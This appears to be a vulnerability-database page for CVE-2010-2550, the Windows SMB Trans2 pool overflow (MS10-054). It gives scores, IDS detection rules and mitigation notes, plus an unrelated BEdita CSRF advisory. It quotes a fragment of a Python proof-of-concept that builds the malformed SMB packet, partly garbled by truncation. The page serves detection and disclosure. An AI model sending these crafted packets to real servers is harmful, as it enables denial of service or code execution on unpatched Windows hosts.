CVE-2010-2550
published 2010-08-11CVE-2010-2550: The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7…
PriorityP275critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
75.72%
99.5th percentile
The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate fields in an SMB request, which allows remote attackers to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability."
Detection & IOCsextracted from sources · hover to see the quote
commandTrans2 QUERY_FS_INFO Query FS Attribute Info with zero-size pool allocation (SMB command 0x32, subcommand 0x0003)↗
snort↗
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB Trans2 Query_Fs_Attribute_Info SrvSmbQueryFsInformation Pool Buffer Overflow"; flow:established,to_server; content:"|ff 53 4d 42 32|"; offset:4; depth:5; content:"|00 00 00 00|"; within:4; content:"|00 00|"; distance:30; within:2; content:"|00 03 00|"; distance:19; within:3; reference:url,www.exploit-db.com/exploits/14607/; reference:url,seclists.org/fulldisclosure/2010/Aug/122; reference:cve,2010-2550; reference:bid,42224; reference:url,www.microsoft.com/technet/security/Bulletin/MS10-054.mspx; classtype:attempted-user; sid:2012094; rev:4; metadata:created_at 2010_12_23, cve CVE_2010_2550, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06;)
bytes↗
|ff 53 4d 42 32|
bytes↗
\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8
- →Detect malicious SMB Trans2 QUERY_FS_ATTRIBUTE_INFO requests by matching the SMB command byte sequence |ff 53 4d 42 32| at offset 4 (depth 5) on TCP port 445, followed by |00 00 00 00| within 4 bytes, |00 00| at distance 30, and |00 03 00| at distance 19 — indicative of the zero-size pool allocation trigger. ↗
- →The exploit targets SRV.SYS via the SrvSmbQueryFsInformation code path. Monitor for unexpected crashes or pool corruption events in SRV.SYS on Windows SMB servers as a host-based indicator. ↗
- →Exploitation may occur without authentication if a guest-accessible SMB share exists. Audit shares for guest/anonymous read access as a risk-reduction and detection-scoping measure. ↗
- ·Authentication is normally required to reach the vulnerable code path; unauthenticated exploitation is only possible when a guest-readable share is present. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET NETBIOS SMB Trans2 Query_Fs_Attribute_Info SrvSmbQueryFsInformation Pool Buffer Overflow
suricata·2010-12-23
CVE-2010-2550 ET NETBIOS SMB Trans2 Query_Fs_Attribute_Info SrvSmbQueryFsInformation Pool Buffer Overflow
ET NETBIOS SMB Trans2 Query_Fs_Attribute_Info SrvSmbQueryFsInformation Pool Buffer Overflow
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB Trans2 Query_Fs_Attribute_Info SrvSmbQueryFsInformation Pool Buffer Overflow"; flow:established,to_server; content:"|ff 53 4d 42 32|"; offset:4; depth:5; content:"|00 00 00 00|"; within:4; content:"|00 00|"; distance:30; within:2; content:"|00 03 00|"; distance:19; within:3; reference:url,www.exploit-db.com/exploits/14607/; reference:url,seclists.org/fulldisclosure/2010/Aug/122; reference:cve,2010-2550; reference:bid,42224; reference:url,www.microsoft.com/technet/security/Bulletin/MS10-054.mspx; classtype:attempted-user; sid:2012094; rev:4; metadata:created_at 2010_12_23, cve CVE_2010_2550, confidence High, signature_severity M
Exploit-DB
BEdita 3.0.1.2550 - Multiple Vulnerabilities
exploitdb·2010-12-15
CVE-2010-5315 BEdita 3.0.1.2550 - Multiple Vulnerabilities
BEdita 3.0.1.2550 - Multiple Vulnerabilities
---
Vulnerability ID: HTB22729
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_bedita.html
Product: BEdita
Vendor: Chialab & ChannelWeb ( http://www.bedita.com/ )
Vulnerable Version: 3.0.1.2550 "betula" and probably prior versions
Vendor Notification: 30 November 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
CSRF:
Vulnerability Details:
The vulnerability exists due to failure in the "bedita-app/controllers/modules/admin_controller.php" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a co
Exploit-DB
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
exploitdb·2010-08-10
CVE-2010-2550 Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
---
#!/usr/bin/env python
import sys,struct,socket
from socket import *
if len(sys.argv)i", len(sharename))[3:4]+sharename
print "[+]Session Query sent"
return struct.pack(">i", len(packetsession))+packetsession
##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info
if data[8:10] == "\x73\x00":
packetrans = "\x00\x00\x00\x46"
packetrans += "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00"
packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00"
packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packetrans += "\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05"
packetrans += "\x00\x00\x44\x20\x05\x01"
print "[+]Malformed Trans2 packet sent
Metasploit
Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
metasploit
Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
This module exploits a denial of service flaw in the Microsoft Windows SMB service on versions of Windows prior to the August 2010 Patch Tuesday. To trigger this bug, you must be able to access a share with at least read privileges. That generally means you will need authentication. However, if a system has a guest accessible share, you can trigger it without any authentication.
No writeups or analysis indexed.
http://www.us-cert.gov/cas/techalerts/TA10-222A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-054https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11106http://www.us-cert.gov/cas/techalerts/TA10-222A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-054https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11106
2010-08-11
Published